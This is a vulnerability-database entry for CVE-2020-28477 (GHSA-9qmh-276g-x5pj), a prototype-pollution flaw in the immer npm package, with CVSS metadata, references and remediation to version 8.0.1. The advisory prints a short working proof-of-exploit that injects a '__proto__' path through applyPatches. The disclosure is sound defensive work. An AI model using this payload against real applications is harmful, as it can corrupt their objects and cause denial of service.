"url": "https://github.com/immerjs/immer/blob/master/src/plugins/patches.ts%23L213"
},
{
"name": "https://snyk.io/vuln/SNYK-JS-IMMER-1019369",
"refsource": "MISC",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://snyk.io/vuln/SNYK-JS-IMMER-1019369"
}
]
}
},
"impact": {
"baseMetricV2": {
"acInsufInfo": false,
"cvssV2": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"userInteractionRequired": false
},
"baseMetricV3": {
"cvssV3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6
}
},
"lastModifiedDate": "2021-02-04T14:43Z",
"publishedDate": "2021-01-19T11:15Z"
}
}
}
ghsa-9qmh-276g-x5pj
Vulnerability from github
Overview
Affected versions of immer are vulnerable to Prototype Pollution.
Proof of exploit
js
const {applyPatches, enablePatches} = require("immer");
enablePatches();
let obj = {};
console.log("Before : " + obj.polluted);
applyPatches({}, [ { op: 'add', path: [ "__proto__", "polluted" ], value: "yes" } ]);
// applyPatches({}, [ { op: 'replace', path: [ "__proto__", "polluted" ], value: "yes" } ]);
console.log("After : " + obj.polluted);
Remediation
Version 8.0.1 contains a fix for this vulnerability, updating is recommended.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "immer"
},
"ranges": [
{
"events": [
{
"introduced": "7.0.0"
},
{
"fixed": "8.0.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2020-28477"
],
"database_specific": {
"cwe_ids": [
"CWE-471"
],
"github_reviewed": true,
"github_reviewed_at": "2021-01-20T19:37:58Z",
"nvd_published_at": "2021-01-19T11:15:00Z",
"severity": "HIGH"
},
"details": "## Overview\n\nAffected versions of immer are vulnerable to Prototype Pollution.\n\n## Proof of exploit\n\n```js\nconst {applyPatches, enablePatches} = require(\"immer\");\nenablePatches();\nlet obj = {};\nconsole.log(\"Before : \" + obj.polluted);\napplyPatches({}, [ { op: \u0027add\u0027, path: [ \"__proto__\", \"polluted\" ], value: \"yes\" } ]);\n// applyPatches({}, [ { op: \u0027replace\u0027, path: [ \"__proto__\", \"polluted\" ], value: \"yes\" } ]);\nconsole.log(\"After : \" + obj.polluted);\n```\n\n## Remediation\n\nVersion 8.0.1 contains a [fix](https://github.com/immerjs/immer/commit/da2bd4fa0edc9335543089fe7d290d6a346c40c5) for this vulnerability, updating is recommended.",
"id": "GHSA-9qmh-276g-x5pj",
"modified": "2024-04-25T22:17:51Z",
"published": "2021-01-20T21:27:56Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28477"
},
{
"type": "WEB",
"url": "https://github.com/immerjs/immer/issues/738"
},
{
"type": "WEB",
"url": "https://github.com/immerjs/immer/commit/da2bd4fa0edc9335543089fe7d290d6a346c40c5"
},
{
"type": "WEB",
"url": "https://github.com/immerjs/immer/blob/master/src/plugins/patches.ts%23L213"
},
{
"type": "WEB",
"url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1061986"
},
{
"type": "WEB",
"url": "https://snyk.io/vuln/SNYK-JS-IMMER-1019369"
},
{
"type": "WEB",
"url": "https://www.npmjs.com/package/immer"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Prototype Pollution in immer"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.